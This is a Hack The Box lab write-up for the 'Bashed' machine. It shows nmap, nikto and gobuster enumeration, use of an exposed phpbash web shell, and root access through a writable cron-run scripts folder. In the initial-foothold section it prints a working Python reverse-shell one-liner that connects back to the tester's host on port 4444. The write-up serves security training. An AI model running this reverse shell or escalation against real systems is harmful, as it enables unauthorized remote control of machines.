Hack The Box “Bashed”
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use the nmapAutomator to automate the process of recon/enumeration.
Summary of our nmap scan results:
---------------------Starting Nmap Basic Scan---------------------Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 09:30 EDT
Nmap scan report for 10.129.167.202
Host is up (0.089s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development SiteService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
Enumeration
Starting nikto scan- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.167.202
+ Target Hostname: 10.129.167.202
+ Target Port: 80
+ Start Time: 2021-06-27 09:43:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. Th e value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 1e3f, size: 55f8bbac32f80, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3268: /php/: Directory indexing found.
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2021-06-27 09:56:02 (GMT-4) (781 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested┌─[arcy24@parrot]─[~/Documents/htb/Bashed]
└──╼ $gobuster dir -u http://10.129.167.202/ -w /usr/share/wordlists/dirb/small.txt -x .php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.167.202/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/06/27 10:06:19 Starting gobuster in directory enumeration mode
===============================================================
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 314] [--> http://10.129.167.202/css/]
/dev (Status: 301) [Size: 314] [--> http://10.129.167.202/dev/]
/images (Status: 301) [Size: 317] [--> http://10.129.167.202/images/]
/js (Status: 301) [Size: 313] [--> http://10.129.167.202/js/]
/php (Status: 301) [Size: 314] [--> http://10.129.167.202/php/]
/uploads (Status: 301) [Size: 318] [--> http://10.129.167.202/uploads/]===============================================================
2021/06/27 10:06:37 Finished
===============================================================
PhpBash
Further enumerating the phpbash website steered us through /dev/ which we have identified additional php files.
Without conducting additional exploits, running ‘phpbash.php’ gave us the phpBash UI.
Initial Foothold
From this stage, you can grab user.txt and start enumerating further to gain root privilege.
From phpBash to netcat
I have decided to create a reverse shell using nc so I can easily upload / download files (if needed) and easier for me to roam around the system to figure out priv escalation paths.
Setup Netcat listener on port 4444
And from the phpbash I ran my python reverse shell command:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" 10.10.14.60",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Upon execution from the phpBash UI, we now have our reverse shell
Privilege Escalation
Used linpeas — https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite for possible local privilege escalation paths and came across ‘(scriptmanager : scriptmanager) NOPASSWD: ALL’
/scripts folder
Found python script in /scripts folder named ‘test.py’, however, the access we have does not have any permission to read the files within the /scripts/ folder.
Using (scriptmanager : scriptmanager)
Pivoting via scriptmanger, we were able to read the data in ‘test.py’ file which when ran, it will create a text file called ‘test.txt’ with ‘testing 123!’ text.
Using the same python that we have executed earlier for our initial foothold, I tried the same concept but this time the port is different and I saved it to a file called ‘arcy24-script.py’.
Initially, I tried to execute arcy24-script.py manually within the ‘/scripts/ folder, though I was successful with my reverse shell, it executed as scriptmanager account and not root.
Re-initialized my netcat listener and waited a bit longer, cronjobs ran and executed the script that I have placed in the ‘/scripts/’ folder then I got root.
References
